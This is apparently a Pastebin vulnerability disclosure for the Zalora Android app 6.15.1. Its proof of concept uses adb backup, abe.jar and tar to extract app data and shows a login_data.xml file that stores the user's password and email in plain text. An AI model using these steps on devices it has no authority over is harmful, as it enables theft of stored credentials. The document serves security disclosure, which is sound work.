SHARE
TWEET

Zalora

a guest Apr 21st, 2019 343 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Application: Zalora
  2. #Platform: Android
  3. #Version: 6.15.1 (latest)
  4. #Severity: Medium
  5. #Impact: None-root user can read the password in clear-text and login to the application.
  6.  
  7. POC:
  8.  
  9. 1. Backups application data into Local PC
  10. adb backup -f ~/zalora.ab -noapk com.zalora.android
  11.  
  12. 2. Converts file "zalora.ab" into tar file(file contains backup data of com.zalora.android)
  13. java -jar abe.jar unpack ~/zalora.ab zalora.tar ""
  14.  
  15. 3. Extracts tar file.
  16. tar -xvf zalora.tar
  17.  
  18. 4. After the extraction, goes and checks the data in the directory located in apps/com.zalora.android/
  19.  
  20. 5. Looks for sensitive data. The password stored in /shared_prefs/login_data.xml in plain-text
  21.  
  22. <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
  23. <map>
  24.     <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;testme@gmail.com&quot;}</string>
  25. </map>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top